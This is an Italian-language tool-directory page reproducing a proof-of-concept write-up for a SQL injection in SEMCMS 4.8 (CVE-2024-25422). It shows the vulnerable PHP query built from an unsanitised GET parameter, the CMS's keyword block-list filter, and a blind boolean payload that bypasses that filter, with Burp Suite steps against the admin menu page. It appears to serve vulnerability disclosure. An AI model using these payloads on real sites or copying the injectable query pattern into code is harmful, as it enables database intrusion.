Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
semcms — In semcms è presente una vulnerabilità di SQL injection (CVE-2024-25422 ) | Kitploit
Strumenti/GitHubGitHub/tzyyyyyyy/semcms
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebPenetration Testing
GitHubtzyyyyyyy/semcms

semcms

In semcms è presente una vulnerabilità di SQL injection (CVE-2024-25422 )

Vedi Repository
2 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Introduzione a Semcms

SEMCMS è un sistema di gestione dei contenuti (CMS) per siti web di commercio estero che supporta più lingue.

root@kitploit:~
v4.8 Link di download: http://www.sem-cms.com/TradeCmsdown/php/semcms_php_4.8.zip

Cause delle vulnerabilità:

/xcR45q_Admin/SEMCMS_Menu.php Riga 66

Codice vulnerabile:

root@kitploit:~
<?php
 } elseif ($type == "edit") {
 
   $row = mysqli_fetch_array($db_conn->query("SELECT * FROM sc_menu WHERE ID=" . $_GET["ID"]));
 
   ?>

Si può vedere che l'ID qui esegue un'istruzione SQL quando i parametri vengono passati tramite GET

Codice di filtro in /Include/contorl. PHP

Riga 151

root@kitploit:~
function test_input($data) { 
    //$data = str_replace("%", "percent", $data);
    $data = trim($data);
    $data = stripslashes($data);
    $data = htmlspecialchars($data,*ENT_QUOTES*);
    return $data;
  }

E l'ottava riga

root@kitploit:~
function inject_check_sql($sql_str) {
 
   return preg_match('/select|and|insert|=|%|<|between|update|\'|\*|union|into|load_file|outfile/i',$sql_str); 
 } 
 function verify_str($str) { 
    if(inject_check_sql($str)) {
      exit('Sorry,You do this is wrong! (.-.)');
     } 
   return $str;
 } 

Filtrando il contenuto sopra, possiamo costruire un payload

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

Ricorrenza delle vulnerabilità

visitare un sito web

root@kitploit:~
http://url/xcR45q_Admin/SEMCMS_Menu.php

Cattura del pacchetto con Burp Suite, poiché la lunghezza del nome del database è 5 quando si crea un nuovo sito, il payload viene costruito come

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,53,36)

(Determina se la lunghezza del nome del database è 5)

Inserisci il payload per vedere l'eco

clip_image002

Cambia il payload a questo punto

root@kitploit:~
-1%20or%20length(database())%20REGEXP%20char(94,54,36)

(Determina se la lunghezza del nome del database è 6)

Cambia il payload a questo punto

clip_image004

L'iniezione SQL può continuare in base ai cambiamenti nella pagina in futuro

Scarica lo strumento